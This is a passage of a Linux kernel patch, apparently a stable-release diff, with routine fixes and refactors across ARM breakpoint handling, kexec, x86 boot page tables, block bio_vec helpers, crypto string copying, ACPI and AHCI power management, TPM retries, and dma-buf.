++	if (uses_default_overflow_handler(bp)) {
+ 		/*
+ 		 * Mismatch breakpoints are required for single-stepping
+ 		 * breakpoints.
+@@ -798,7 +798,7 @@ static void watchpoint_handler(unsigned long addr, unsigned int fsr,
+ 		 * Otherwise, insert a temporary mismatch breakpoint so that
+ 		 * we can single-step over the watchpoint trigger.
+ 		 */
+-		if (!is_default_overflow_handler(wp))
++		if (!uses_default_overflow_handler(wp))
+ 			continue;
+ step:
+ 		enable_single_step(wp, instruction_pointer(regs));
+@@ -811,7 +811,7 @@ step:
+ 		info->trigger = addr;
+ 		pr_debug("watchpoint fired: address = 0x%x\n", info->trigger);
+ 		perf_bp_event(wp, regs);
+-		if (is_default_overflow_handler(wp))
++		if (uses_default_overflow_handler(wp))
+ 			enable_single_step(wp, instruction_pointer(regs));
+ 	}
+ 
+@@ -886,7 +886,7 @@ static void breakpoint_handler(unsigned long unknown, struct pt_regs *regs)
+ 			info->trigger = addr;
+ 			pr_debug("breakpoint fired: address = 0x%x\n", addr);
+ 			perf_bp_event(bp, regs);
+-			if (is_default_overflow_handler(bp))
++			if (uses_default_overflow_handler(bp))
+ 				enable_single_step(bp, addr);
+ 			goto unlock;
+ 		}
+diff --git a/arch/arm/kernel/machine_kexec.c b/arch/arm/kernel/machine_kexec.c
+index f567032a09c0b..6d1938d1b4df7 100644
+--- a/arch/arm/kernel/machine_kexec.c
++++ b/arch/arm/kernel/machine_kexec.c
+@@ -92,16 +92,28 @@ void machine_crash_nonpanic_core(void *unused)
+ 	}
+ }
+ 
++static DEFINE_PER_CPU(call_single_data_t, cpu_stop_csd) =
++	CSD_INIT(machine_crash_nonpanic_core, NULL);
++
+ void crash_smp_send_stop(void)
+ {
+ 	static int cpus_stopped;
+ 	unsigned long msecs;
++	call_single_data_t *csd;
++	int cpu, this_cpu = raw_smp_processor_id();
+ 
+ 	if (cpus_stopped)
+ 		return;
+ 
+ 	atomic_set(&waiting_for_crash_ipi, num_online_cpus() - 1);
+-	smp_call_function(machine_crash_nonpanic_core, NULL, false);
++	for_each_online_cpu(cpu) {
++		if (cpu == this_cpu)
++			continue;
++
++		csd = &per_cpu(cpu_stop_csd, cpu);
++		smp_call_function_single_async(cpu, csd);
++	}
++
+ 	msecs = 1000; /* Wait at most a second for the other cpus to stop */
+ 	while ((atomic_read(&waiting_for_crash_ipi) > 0) && msecs) {
+ 		mdelay(1);
+diff --git a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+index e1ab5b5189949..4a77b650c0d8d 100644
+--- a/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
++++ b/arch/arm64/boot/dts/qcom/sm6125-sony-xperia-seine-pdx201.dts
+@@ -73,7 +73,7 @@
+ 			reg = <0x0 0xffc40000 0x0 0xc0000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			msg-size = <0x20000 0x20000>;
++			pmsg-size = <0x20000>;
+ 		};
+ 
+ 		cmdline_mem: memory@ffd00000 {
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index 34c8de4f43fba..cea7ca3f326fc 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -346,7 +346,7 @@
+ 			reg = <0 0xffc00000 0 0x100000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			msg-size = <0x20000 0x20000>;
++			pmsg-size = <0x20000>;
+ 			ecc-size = <16>;
+ 			no-map;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+index 04c71f74ab72d..c9aa7764fc59a 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+@@ -127,7 +127,7 @@
+ 			reg = <0x0 0xffc00000 0x0 0x100000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			msg-size = <0x20000 0x20000>;
++			pmsg-size = <0x20000>;
+ 			ecc-size = <16>;
+ 			no-map;
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+index 3b710c6a326a5..3b306dfb91e0d 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo.dtsi
+@@ -126,7 +126,7 @@
+ 			reg = <0x0 0xffc00000 0x0 0x100000>;
+ 			record-size = <0x1000>;
+ 			console-size = <0x40000>;
+-			msg-size = <0x20000 0x20000>;
++			pmsg-size = <0x20000>;
+ 			ecc-size = <16>;
+ 			no-map;
+ 		};
+diff --git a/arch/arm64/kernel/hw_breakpoint.c b/arch/arm64/kernel/hw_breakpoint.c
+index b29a311bb0552..9659a9555c63a 100644
+--- a/arch/arm64/kernel/hw_breakpoint.c
++++ b/arch/arm64/kernel/hw_breakpoint.c
+@@ -654,7 +654,7 @@ static int breakpoint_handler(unsigned long unused, unsigned long esr,
+ 		perf_bp_event(bp, regs);
+ 
+ 		/* Do we need to handle the stepping? */
+-		if (is_default_overflow_handler(bp))
++		if (uses_default_overflow_handler(bp))
+ 			step = 1;
+ unlock:
+ 		rcu_read_unlock();
+@@ -733,7 +733,7 @@ static u64 get_distance_from_watchpoint(unsigned long addr, u64 val,
+ static int watchpoint_report(struct perf_event *wp, unsigned long addr,
+ 			     struct pt_regs *regs)
+ {
+-	int step = is_default_overflow_handler(wp);
++	int step = uses_default_overflow_handler(wp);
+ 	struct arch_hw_breakpoint *info = counter_arch_bp(wp);
+ 
+ 	info->trigger = addr;
+diff --git a/arch/mips/Makefile b/arch/mips/Makefile
+index ee8f47aef98b3..dd6486097e1dc 100644
+--- a/arch/mips/Makefile
++++ b/arch/mips/Makefile
+@@ -352,7 +352,7 @@ KBUILD_LDFLAGS		+= -m $(ld-emul)
+ 
+ ifdef need-compiler
+ CHECKFLAGS += $(shell $(CC) $(KBUILD_CFLAGS) -dM -E -x c /dev/null | \
+-	egrep -vw '__GNUC_(MINOR_|PATCHLEVEL_)?_' | \
++	grep -E -vw '__GNUC_(MINOR_|PATCHLEVEL_)?_' | \
+ 	sed -e "s/^\#define /-D'/" -e "s/ /'='/" -e "s/$$/'/" -e 's/\$$/&&/g')
+ endif
+ 
+diff --git a/arch/mips/vdso/Makefile b/arch/mips/vdso/Makefile
+index f72658b3a53f7..1f7d5c6c10b08 100644
+--- a/arch/mips/vdso/Makefile
++++ b/arch/mips/vdso/Makefile
+@@ -71,7 +71,7 @@ KCOV_INSTRUMENT := n
+ 
+ # Check that we don't have PIC 'jalr t9' calls left
+ quiet_cmd_vdso_mips_check = VDSOCHK $@
+-      cmd_vdso_mips_check = if $(OBJDUMP) --disassemble $@ | egrep -h "jalr.*t9" > /dev/null; \
++      cmd_vdso_mips_check = if $(OBJDUMP) --disassemble $@ | grep -E -h "jalr.*t9" > /dev/null; \
+ 		       then (echo >&2 "$@: PIC 'jalr t9' calls are not supported"; \
+ 			     rm -f $@; /bin/false); fi
+ 
+diff --git a/arch/powerpc/platforms/pseries/ibmebus.c b/arch/powerpc/platforms/pseries/ibmebus.c
+index a870cada7acd2..ed5fc70b7353a 100644
+--- a/arch/powerpc/platforms/pseries/ibmebus.c
++++ b/arch/powerpc/platforms/pseries/ibmebus.c
+@@ -455,6 +455,7 @@ static int __init ibmebus_bus_init(void)
+ 	if (err) {
+ 		printk(KERN_WARNING "%s: device_register returned %i\n",
+ 		       __func__, err);
++		put_device(&ibmebus_bus_device);
+ 		bus_unregister(&ibmebus_bus_type);
+ 
+ 		return err;
+diff --git a/arch/riscv/kernel/elf_kexec.c b/arch/riscv/kernel/elf_kexec.c
+index c08bb5c3b3857..b3b96ff46d193 100644
+--- a/arch/riscv/kernel/elf_kexec.c
++++ b/arch/riscv/kernel/elf_kexec.c
+@@ -98,7 +98,13 @@ static int elf_find_pbase(struct kimage *image, unsigned long kernel_len,
+ 	kbuf.image = image;
+ 	kbuf.buf_min = lowest_paddr;
+ 	kbuf.buf_max = ULONG_MAX;
+-	kbuf.buf_align = PAGE_SIZE;
++
++	/*
++	 * Current riscv boot protocol requires 2MB alignment for
++	 * RV64 and 4MB alignment for RV32
++	 *
++	 */
++	kbuf.buf_align = PMD_SIZE;
+ 	kbuf.mem = KEXEC_BUF_MEM_UNKNOWN;
+ 	kbuf.memsz = ALIGN(kernel_len, PAGE_SIZE);
+ 	kbuf.top_down = false;
+diff --git a/arch/x86/boot/compressed/ident_map_64.c b/arch/x86/boot/compressed/ident_map_64.c
+index 321a5011042d4..b4155273df891 100644
+--- a/arch/x86/boot/compressed/ident_map_64.c
++++ b/arch/x86/boot/compressed/ident_map_64.c
+@@ -67,6 +67,14 @@ static void *alloc_pgt_page(void *context)
+ 		return NULL;
+ 	}
+ 
++	/* Consumed more tables than expected? */
++	if (pages->pgt_buf_offset == BOOT_PGT_SIZE_WARN) {
++		debug_putstr("pgt_buf running low in " __FILE__ "\n");
++		debug_putstr("Need to raise BOOT_PGT_SIZE?\n");
++		debug_putaddr(pages->pgt_buf_offset);
++		debug_putaddr(pages->pgt_buf_size);
++	}
++
+ 	entry = pages->pgt_buf + pages->pgt_buf_offset;
+ 	pages->pgt_buf_offset += PAGE_SIZE;
+ 
+diff --git a/arch/x86/include/asm/boot.h b/arch/x86/include/asm/boot.h
+index 9191280d9ea31..215d37f7dde8a 100644
+--- a/arch/x86/include/asm/boot.h
++++ b/arch/x86/include/asm/boot.h
+@@ -40,23 +40,40 @@
+ #ifdef CONFIG_X86_64
+ # define BOOT_STACK_SIZE	0x4000
+ 
++/*
++ * Used by decompressor's startup_32() to allocate page tables for identity
++ * mapping of the 4G of RAM in 4-level paging mode:
++ * - 1 level4 table;
++ * - 1 level3 table;
++ * - 4 level2 table that maps everything with 2M pages;
++ *
++ * The additional level5 table needed for 5-level paging is allocated from
++ * trampoline_32bit memory.
++ */
+ # define BOOT_INIT_PGT_SIZE	(6*4096)
+-# ifdef CONFIG_RANDOMIZE_BASE
++
+ /*
+- * Assuming all cross the 512GB boundary:
+- * 1 page for level4
+- * (2+2)*4 pages for kernel, param, cmd_line, and randomized kernel
+- * 2 pages for first 2M (video RAM: CONFIG_X86_VERBOSE_BOOTUP).
+- * Total is 19 pages.
++ * Total number of page tables kernel_add_identity_map() can allocate,
++ * including page tables consumed by startup_32().
++ *
++ * Worst-case scenario:
++ *  - 5-level paging needs 1 level5 table;
++ *  - KASLR needs to map kernel, boot_params, cmdline and randomized kernel,
++ *    assuming all of them cross 256T boundary:
++ *    + 4*2 level4 table;
++ *    + 4*2 level3 table;
++ *    + 4*2 level2 table;
++ *  - X86_VERBOSE_BOOTUP needs to map the first 2M (video RAM):
++ *    + 1 level4 table;
++ *    + 1 level3 table;
++ *    + 1 level2 table;
++ * Total: 28 tables
++ *
++ * Add 4 spare table in case decompressor touches anything beyond what is
++ * accounted above. Warn if it happens.
+  */
+-#  ifdef CONFIG_X86_VERBOSE_BOOTUP
+-#   define BOOT_PGT_SIZE	(19*4096)
+-#  else /* !CONFIG_X86_VERBOSE_BOOTUP */
+-#   define BOOT_PGT_SIZE	(17*4096)
+-#  endif
+-# else /* !CONFIG_RANDOMIZE_BASE */
+-#  define BOOT_PGT_SIZE		BOOT_INIT_PGT_SIZE
+-# endif
++# define BOOT_PGT_SIZE_WARN	(28*4096)
++# define BOOT_PGT_SIZE		(32*4096)
+ 
+ #else /* !CONFIG_X86_64 */
+ # define BOOT_STACK_SIZE	0x1000
+diff --git a/arch/x86/include/asm/linkage.h b/arch/x86/include/asm/linkage.h
+index f484d656d34ee..3a0282a6a55df 100644
+--- a/arch/x86/include/asm/linkage.h
++++ b/arch/x86/include/asm/linkage.h
+@@ -8,6 +8,14 @@
+ #undef notrace
+ #define notrace __attribute__((no_instrument_function))
+ 
++#ifdef CONFIG_64BIT
++/*
++ * The generic version tends to create spurious ENDBR instructions under
++ * certain conditions.
++ */
++#define _THIS_IP_ ({ unsigned long __here; asm ("lea 0(%%rip), %0" : "=r" (__here)); __here; })
++#endif
++
+ #ifdef CONFIG_X86_32
+ #define asmlinkage CPP_ASMLINKAGE __attribute__((regparm(0)))
+ #endif /* CONFIG_X86_32 */
+diff --git a/arch/x86/purgatory/Makefile b/arch/x86/purgatory/Makefile
+index 42abd6af11984..d28e0987aa85b 100644
+--- a/arch/x86/purgatory/Makefile
++++ b/arch/x86/purgatory/Makefile
+@@ -19,6 +19,10 @@ CFLAGS_sha256.o := -D__DISABLE_EXPORTS
+ # optimization flags.
+ KBUILD_CFLAGS := $(filter-out -fprofile-sample-use=% -fprofile-use=%,$(KBUILD_CFLAGS))
+ 
++# When LTO is enabled, llvm emits many text sections, which is not supported
++# by kexec. Remove -flto=* flags.
++KBUILD_CFLAGS := $(filter-out $(CC_FLAGS_LTO),$(KBUILD_CFLAGS))
++
+ # When linking purgatory.ro with -r unresolved symbols are not checked,
+ # also link a purgatory.chk binary without -r to check for unresolved symbols.
+ PURGATORY_LDFLAGS := -e purgatory_start -z nodefaultlib
+diff --git a/block/bio-integrity.c b/block/bio-integrity.c
+index 91ffee6fc8cb4..4533eb4916610 100644
+--- a/block/bio-integrity.c
++++ b/block/bio-integrity.c
+@@ -124,23 +124,18 @@ int bio_integrity_add_page(struct bio *bio, struct page *page,
+ 			   unsigned int len, unsigned int offset)
+ {
+ 	struct bio_integrity_payload *bip = bio_integrity(bio);
+-	struct bio_vec *iv;
+ 
+ 	if (bip->bip_vcnt >= bip->bip_max_vcnt) {
+ 		printk(KERN_ERR "%s: bip_vec full\n", __func__);
+ 		return 0;
+ 	}
+ 
+-	iv = bip->bip_vec + bip->bip_vcnt;
+-
+ 	if (bip->bip_vcnt &&
+ 	    bvec_gap_to_prev(&bdev_get_queue(bio->bi_bdev)->limits,
+ 			     &bip->bip_vec[bip->bip_vcnt - 1], offset))
+ 		return 0;
+ 
+-	iv->bv_page = page;
+-	iv->bv_len = len;
+-	iv->bv_offset = offset;
++	bvec_set_page(&bip->bip_vec[bip->bip_vcnt], page, len, offset);
+ 	bip->bip_vcnt++;
+ 
+ 	return len;
+diff --git a/block/bio.c b/block/bio.c
+index d5cd825d6efc0..9ec72a78f1149 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -976,10 +976,7 @@ int bio_add_hw_page(struct request_queue *q, struct bio *bio,
+ 	if (bio->bi_vcnt >= queue_max_segments(q))
+ 		return 0;
+ 
+-	bvec = &bio->bi_io_vec[bio->bi_vcnt];
+-	bvec->bv_page = page;
+-	bvec->bv_len = len;
+-	bvec->bv_offset = offset;
++	bvec_set_page(&bio->bi_io_vec[bio->bi_vcnt], page, len, offset);
+ 	bio->bi_vcnt++;
+ 	bio->bi_iter.bi_size += len;
+ 	return len;
+@@ -1055,15 +1052,10 @@ EXPORT_SYMBOL_GPL(bio_add_zone_append_page);
+ void __bio_add_page(struct bio *bio, struct page *page,
+ 		unsigned int len, unsigned int off)
+ {
+-	struct bio_vec *bv = &bio->bi_io_vec[bio->bi_vcnt];
+-
+ 	WARN_ON_ONCE(bio_flagged(bio, BIO_CLONED));
+ 	WARN_ON_ONCE(bio_full(bio, len));
+ 
+-	bv->bv_page = page;
+-	bv->bv_offset = off;
+-	bv->bv_len = len;
+-
++	bvec_set_page(&bio->bi_io_vec[bio->bi_vcnt], page, len, off);
+ 	bio->bi_iter.bi_size += len;
+ 	bio->bi_vcnt++;
+ }
+diff --git a/crypto/lrw.c b/crypto/lrw.c
+index 8d59a66b65255..fb8892ed179f5 100644
+--- a/crypto/lrw.c
++++ b/crypto/lrw.c
+@@ -357,10 +357,10 @@ static int lrw_create(struct crypto_template *tmpl, struct rtattr **tb)
+ 	 * cipher name.
+ 	 */
+ 	if (!strncmp(cipher_name, "ecb(", 4)) {
+-		unsigned len;
++		int len;
+ 
+-		len = strlcpy(ecb_name, cipher_name + 4, sizeof(ecb_name));
+-		if (len < 2 || len >= sizeof(ecb_name))
++		len = strscpy(ecb_name, cipher_name + 4, sizeof(ecb_name));
++		if (len < 2)
+ 			goto err_free_inst;
+ 
+ 		if (ecb_name[len - 1] != ')')
+diff --git a/crypto/xts.c b/crypto/xts.c
+index de6cbcf69bbd6..b05020657cdc8 100644
+--- a/crypto/xts.c
++++ b/crypto/xts.c
+@@ -396,10 +396,10 @@ static int xts_create(struct crypto_template *tmpl, struct rtattr **tb)
+ 	 * cipher name.
+ 	 */
+ 	if (!strncmp(cipher_name, "ecb(", 4)) {
+-		unsigned len;
++		int len;
+ 
+-		len = strlcpy(ctx->name, cipher_name + 4, sizeof(ctx->name));
+-		if (len < 2 || len >= sizeof(ctx->name))
++		len = strscpy(ctx->name, cipher_name + 4, sizeof(ctx->name));
++		if (len < 2)
+ 			goto err_free_inst;
+ 
+ 		if (ctx->name[len - 1] != ')')
+diff --git a/drivers/acpi/acpica/psopcode.c b/drivers/acpi/acpica/psopcode.c
+index bef69e87a0a29..8c34c0ffb1d93 100644
+--- a/drivers/acpi/acpica/psopcode.c
++++ b/drivers/acpi/acpica/psopcode.c
+@@ -603,7 +603,7 @@ const struct acpi_opcode_info acpi_gbl_aml_op_info[AML_NUM_OPCODES] = {
+ 
+ /* 7E */ ACPI_OP("Timer", ARGP_TIMER_OP, ARGI_TIMER_OP, ACPI_TYPE_ANY,
+ 			 AML_CLASS_EXECUTE, AML_TYPE_EXEC_0A_0T_1R,
+-			 AML_FLAGS_EXEC_0A_0T_1R),
++			 AML_FLAGS_EXEC_0A_0T_1R | AML_NO_OPERAND_RESOLVE),
+ 
+ /* ACPI 5.0 opcodes */
+ 
+diff --git a/drivers/acpi/arm64/iort.c b/drivers/acpi/arm64/iort.c
+index 2e1cae53536f5..3a6cf5675e607 100644
+--- a/drivers/acpi/arm64/iort.c
++++ b/drivers/acpi/arm64/iort.c
+@@ -1699,7 +1699,10 @@ static void __init arm_smmu_v3_pmcg_init_resources(struct resource *res,
+ static struct acpi_platform_list pmcg_plat_info[] __initdata = {
+ 	/* HiSilicon Hip08 Platform */
+ 	{"HISI  ", "HIP08   ", 0, ACPI_SIG_IORT, greater_than_or_equal,
+-	 "Erratum #162001800", IORT_SMMU_V3_PMCG_HISI_HIP08},
++	 "Erratum #162001800, Erratum #162001900", IORT_SMMU_V3_PMCG_HISI_HIP08},
++	/* HiSilicon Hip09 Platform */
++	{"HISI  ", "HIP09   ", 0, ACPI_SIG_IORT, greater_than_or_equal,
++	 "Erratum #162001900", IORT_SMMU_V3_PMCG_HISI_HIP09},
+ 	{ }
+ };
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 707d6811615b8..073d26ddb6c21 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -443,6 +443,15 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_BOARD_NAME, "Lenovo IdeaPad S405"),
+ 		},
+ 	},
++	{
++	 /* https://bugzilla.suse.com/show_bug.cgi?id=1208724 */
++	 .callback = video_detect_force_native,
++	 /* Lenovo Ideapad Z470 */
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Z470"),
++		},
++	},
+ 	{
+ 	 /* https://bugzilla.redhat.com/show_bug.cgi?id=1187004 */
+ 	 .callback = video_detect_force_native,
+diff --git a/drivers/acpi/x86/s2idle.c b/drivers/acpi/x86/s2idle.c
+index ec84da6cc1bff..5510657d4be81 100644
+--- a/drivers/acpi/x86/s2idle.c
++++ b/drivers/acpi/x86/s2idle.c
+@@ -112,6 +112,12 @@ static void lpi_device_get_constraints_amd(void)
+ 		union acpi_object *package = &out_obj->package.elements[i];
+ 
+ 		if (package->type == ACPI_TYPE_PACKAGE) {
++			if (lpi_constraints_table) {
++				acpi_handle_err(lps0_device_handle,
++						"Duplicate constraints list\n");
++				goto free_acpi_buffer;
++			}
++
+ 			lpi_constraints_table = kcalloc(package->package.count,
+ 							sizeof(*lpi_constraints_table),
+ 							GFP_KERNEL);
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 1645335b8d2df..805645efb3ccf 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -1884,6 +1884,15 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	else
+ 		dev_info(&pdev->dev, "SSS flag set, parallel bus scan disabled\n");
+ 
++	if (!(hpriv->cap & HOST_CAP_PART))
++		host->flags |= ATA_HOST_NO_PART;
++
++	if (!(hpriv->cap & HOST_CAP_SSC))
++		host->flags |= ATA_HOST_NO_SSC;
++
++	if (!(hpriv->cap2 & HOST_CAP2_SDS))
++		host->flags |= ATA_HOST_NO_DEVSLP;
++
+ 	if (pi.flags & ATA_FLAG_EM)
+ 		ahci_reset_em(host);
+ 
+diff --git a/drivers/ata/libahci.c b/drivers/ata/libahci.c
+index 954386a2b5002..1b1671c027cd3 100644
+--- a/drivers/ata/libahci.c
++++ b/drivers/ata/libahci.c
+@@ -1255,6 +1255,26 @@ static ssize_t ahci_activity_show(struct ata_device *dev, char *buf)
+ 	return sprintf(buf, "%d\n", emp->blink_policy);
+ }
+ 
++static void ahci_port_clear_pending_irq(struct ata_port *ap)
++{
++	struct ahci_host_priv *hpriv = ap->host->private_data;
++	void __iomem *port_mmio = ahci_port_base(ap);
++	u32 tmp;
++
++	/* clear SError */
++	tmp = readl(port_mmio + PORT_SCR_ERR);
++	dev_dbg(ap->host->dev, "PORT_SCR_ERR 0x%x\n", tmp);
++	writel(tmp, port_mmio + PORT_SCR_ERR);
++
++	/* clear port IRQ */
++	tmp = readl(port_mmio + PORT_IRQ_STAT);
++	dev_dbg(ap->host->dev, "PORT_IRQ_STAT 0x%x\n", tmp);
++	if (tmp)
++		writel(tmp, port_mmio + PORT_IRQ_STAT);
++
++	writel(1 << ap->port_no, hpriv->mmio + HOST_IRQ_STAT);
++}
++
+ static void ahci_port_init(struct device *dev, struct ata_port *ap,
+ 			   int port_no, void __iomem *mmio,
+ 			   void __iomem *port_mmio)
+@@ -1269,18 +1289,7 @@ static void ahci_port_init(struct device *dev, struct ata_port *ap,
+ 	if (rc)
+ 		dev_warn(dev, "%s (%d)\n", emsg, rc);
+ 
+-	/* clear SError */
+-	tmp = readl(port_mmio + PORT_SCR_ERR);
+-	dev_dbg(dev, "PORT_SCR_ERR 0x%x\n", tmp);
+-	writel(tmp, port_mmio + PORT_SCR_ERR);
+-
+-	/* clear port IRQ */
+-	tmp = readl(port_mmio + PORT_IRQ_STAT);
+-	dev_dbg(dev, "PORT_IRQ_STAT 0x%x\n", tmp);
+-	if (tmp)
+-		writel(tmp, port_mmio + PORT_IRQ_STAT);
+-
+-	writel(1 << port_no, mmio + HOST_IRQ_STAT);
++	ahci_port_clear_pending_irq(ap);
+ 
+ 	/* mark esata ports */
+ 	tmp = readl(port_mmio + PORT_CMD);
+@@ -1601,6 +1610,8 @@ int ahci_do_hardreset(struct ata_link *link, unsigned int *class,
+ 	tf.status = ATA_BUSY;
+ 	ata_tf_to_fis(&tf, 0, 0, d2h_fis);
+ 
++	ahci_port_clear_pending_irq(ap);
++
+ 	rc = sata_link_hardreset(link, timing, deadline, online,
+ 				 ahci_check_ready);
+ 
+diff --git a/drivers/ata/libata-sata.c b/drivers/ata/libata-sata.c
+index fd4dccc253896..71a00842eb5ee 100644
+--- a/drivers/ata/libata-sata.c
++++ b/drivers/ata/libata-sata.c
+@@ -394,10 +394,23 @@ int sata_link_scr_lpm(struct ata_link *link, enum ata_lpm_policy policy,
+ 	case ATA_LPM_MED_POWER_WITH_DIPM:
+ 	case ATA_LPM_MIN_POWER_WITH_PARTIAL:
+ 	case ATA_LPM_MIN_POWER:
+-		if (ata_link_nr_enabled(link) > 0)
+-			/* no restrictions on LPM transitions */
++		if (ata_link_nr_enabled(link) > 0) {
++			/* assume no restrictions on LPM transitions */
+ 			scontrol &= ~(0x7 << 8);
+-		else {
++
++			/*
++			 * If the controller does not support partial, slumber,
++			 * or devsleep, then disallow these transitions.
++			 */
++			if (link->ap->host->flags & ATA_HOST_NO_PART)
++				scontrol |= (0x1 << 8);
++
++			if (link->ap->host->flags & ATA_HOST_NO_SSC)
++				scontrol |= (0x2 << 8);
++
++			if (link->ap->host->flags & ATA_HOST_NO_DEVSLP)
++				scontrol |= (0x4 << 8);
++		} else {
+ 			/* empty port, power off */
+ 			scontrol &= ~0xf;
+ 			scontrol |= (0x1 << 2);
+diff --git a/drivers/bus/ti-sysc.c b/drivers/bus/ti-sysc.c
+index ac36b01cf6d5d..ddde1427c90c7 100644
+--- a/drivers/bus/ti-sysc.c
++++ b/drivers/bus/ti-sysc.c
+@@ -1548,6 +1548,8 @@ static const struct sysc_revision_quirk sysc_revision_quirks[] = {
+ 		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x47422e03, 0xffffffff,
+ 		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x47424e03, 0xffffffff,
++		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
+ 
+ 	/* Quirks that need to be set based on the module address */
+ 	SYSC_QUIRK("mcpdm", 0x40132000, 0, 0x10, -ENODEV, 0x50000800, 0xffffffff,
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index 44f71f2c8cfa0..5889d9edaf940 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -498,10 +498,17 @@ static int tpm_tis_send_main(struct tpm_chip *chip, const u8 *buf, size_t len)
+ 	int rc;
+ 	u32 ordinal;
+ 	unsigned long dur;
++	unsigned int try;
+ 
+-	rc = tpm_tis_send_data(chip, buf, len);
+-	if (rc < 0)
+-		return rc;
++	for (try = 0; try < TPM_RETRY; try++) {
++		rc = tpm_tis_send_data(chip, buf, len);
++		if (rc >= 0)
++			/* Data transfer done successfully */
++			break;
++		else if (rc != -EIO)
++			/* Data transfer failed, not recoverable */
++			return rc;
++	}
+ 
+ 	rc = tpm_tis_verify_crc(priv, len, buf);
+ 	if (rc < 0) {
+diff --git a/drivers/dma-buf/dma-buf.c b/drivers/dma-buf/dma-buf.c
+index eb6b59363c4f5..3d58514d04826 100644
+--- a/drivers/dma-buf/dma-buf.c
++++ b/drivers/dma-buf/dma-buf.c
+@@ -1105,6 +1105,34 @@ struct sg_table *dma_buf_map_attachment(struct dma_buf_attachment *attach,
+ }
+ EXPORT_SYMBOL_NS_GPL(dma_buf_map_attachment, DMA_BUF);
+ 
++/**
++ * dma_buf_map_attachment_unlocked - Returns the scatterlist table of the attachment;
++ * mapped into _device_ address space. Is a wrapper for map_dma_buf() of the
++ * dma_buf_ops.
++ * @attach:	[in]	attachment whose scatterlist is to be returned
++ * @direction:	[in]	direction of DMA transfer
++ *
++ * Unlocked variant of dma_buf_map_attachment().
++ */
++struct sg_table *
++dma_buf_map_attachment_unlocked(struct dma_buf_attachment *attach,
++				enum dma_data_direction direction)
++{
++	struct sg_table *sg_table;
++
++	might_sleep();
++
++	if (WARN_ON(!attach || !attach->dmabuf))
++		return ERR_PTR(-EINVAL);
++
++	dma_resv_lock(attach->dmabuf->resv, NULL);
++	sg_table = dma_buf_map_attachment(attach, direction);
++	dma_resv_unlock(attach->dmabuf->resv);
++
++	return sg_table;
++}
++EXPORT_SYMBOL_NS_GPL(dma_buf_map_attachment_unlocked, DMA_BUF);
++
+ /**
+  * dma_buf_unmap_attachment - unmaps and decreases usecount of the buffer;might
+  * deallocate the scatterlist associated. Is a wrapper for unmap_dma_buf() of
+@@ -1141,6 +1169,31 @@ void dma_buf_unmap_attachment(struct dma_buf_attachment *attach,
+ }
+ EXPORT_SYMBOL_NS_GPL(dma_buf_unmap_attachment, DMA_BUF);
+ 
++/**
++ * dma_buf_unmap_attachment_unlocked - unmaps and decreases usecount of the buffer;might
++ * deallocate the scatterlist associated. Is a wrapper for unmap_dma_buf() of
++ * dma_buf_ops.
++ * @attach:	[in]	attachment to unmap buffer from
++ * @sg_table:	[in]	scatterlist info of the buffer to unmap
++ * @direction:	[in]	direction of DMA transfer
++ *
++ * Unlocked variant of dma_buf_unmap_attachment().
++ */
++void dma_buf_unmap_attachment_unlocked(struct dma_buf_attachment *attach,
++				       struct sg_table *sg_table,
++				       enum dma_data_direction direction)
++{
++	might_sleep();
++
++	if (WARN_ON(!attach || !attach->dmabuf || !sg_table))
++		return;
++
++	dma_resv_lock(attach->dmabuf->resv, NULL);
++	dma_buf_unmap_attachment(attach, sg_table, direction);
++	dma_resv_unlock(attach->dmabuf->resv);
++}
++EXPORT_SYMBOL_NS_GPL(dma_buf_unmap_attachment_unlocked, DMA_BUF);
++
+ /**
+  * dma_buf_move_notify - notify attachments that DMA-buf is moving
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index 0c962f996aff5..c46c6fbd235e8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
